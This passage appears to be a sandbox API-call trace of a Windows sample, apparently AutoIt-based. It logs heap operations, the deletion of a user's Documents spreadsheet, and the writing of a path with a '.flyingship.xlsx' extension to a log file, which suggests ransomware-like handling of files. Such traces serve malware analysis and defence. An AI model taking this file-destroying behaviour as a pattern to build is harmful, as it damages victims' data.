out: hHeap=0x8a0000) returned 1 [0169.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0169.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0169.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0169.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0169.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0169.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0169.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0169.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0169.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0169.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0169.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0169.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0169.150] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0169.150] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0169.150] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0169.152] FreeLibrary (hLibModule=0x75990000) returned 1 [0169.152] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx", lpFilePart=0x0) returned 0x39 [0169.153] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x862f1b80, ftCreationTime.dwHighDateTime=0x1d57779, ftLastAccessTime.dwLowDateTime=0x8cd8dec0, ftLastAccessTime.dwHighDateTime=0x1d57a90, ftLastWriteTime.dwLowDateTime=0xa2d8460, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x138f3, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="F8kGUIlkgYER.xlsx", cAlternateFileName="F8KGUI~1.XLS")) returned 0x90ae18 [0169.153] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f8kguilkgyer.xlsx")) returned 1 [0169.158] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x862f1b80, ftCreationTime.dwHighDateTime=0x1d57779, ftLastAccessTime.dwLowDateTime=0x8cd8dec0, ftLastAccessTime.dwHighDateTime=0x1d57a90, ftLastWriteTime.dwLowDateTime=0xa2d8460, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x138f3, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="F8kGUIlkgYER.xlsx", cAlternateFileName="F8KGUI~1.XLS")) returned 0 [0169.158] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0169.158] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0169.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.159] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0169.159] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0169.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0169.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0169.159] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0169.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0169.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0169.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0169.159] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0169.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0169.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0169.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0169.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0169.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0169.160] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0169.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0169.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0169.160] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0169.160] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.160] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0169.160] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.160] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0169.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0169.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9c5180 [0169.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0169.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0169.161] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0169.161] ReadFile (in: hFile=0x138, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87f43c*=0xd80, lpOverlapped=0x0) returned 1 [0169.161] ReadFile (in: hFile=0x138, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0169.161] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0xd80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.161] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0169.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0169.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0169.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0169.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0169.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.flyingship.xlsx\r\n", cchWideChar=71, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 71 [0169.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x47) returned 0x9aa4f8 [0169.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.flyingship.xlsx\r\n", cchWideChar=71, lpMultiByteStr=0x9aa4f8, cbMultiByte=71, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.flyingship.xlsx\r\n", lpUsedDefaultChar=0x0) returned 71 [0169.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0169.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0169.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0169.162] WriteFile (in: hFile=0x138, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x46, lpOverlapped=0x0) returned 1 [0169.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0169.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0169.162] CloseHandle (hObject=0x138) returned 1 [0169.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0169.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0169.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b008 | out: hHeap=0x8a0000) returned 1 [0169.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0169.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0169.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0169.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0169.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0169.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0169.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0169.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0169.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0169.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0169.165] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0169.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0169.165] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0169.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0169.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0169.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0169.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0169.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0169.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0169.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0169.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0169.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0169.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0169.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0169.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0169.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0169.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0169.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0169.167] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0169.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0169.167] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0169.167] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0169.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0169.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0169.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0169.167] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0169.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0169.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0169.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0169.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0169.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0169.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0169.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0169.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0169.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0169.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0169.168] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0169.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0169.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0169.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0169.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0169.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0169.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0169.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0169.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0169.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0169.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0169.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0169.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0169.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0169.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0169.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0169.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0169.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0169.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0169.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0169.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0169.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0169.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0169.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0169.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0169.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0169.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0169.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0169.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0169.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 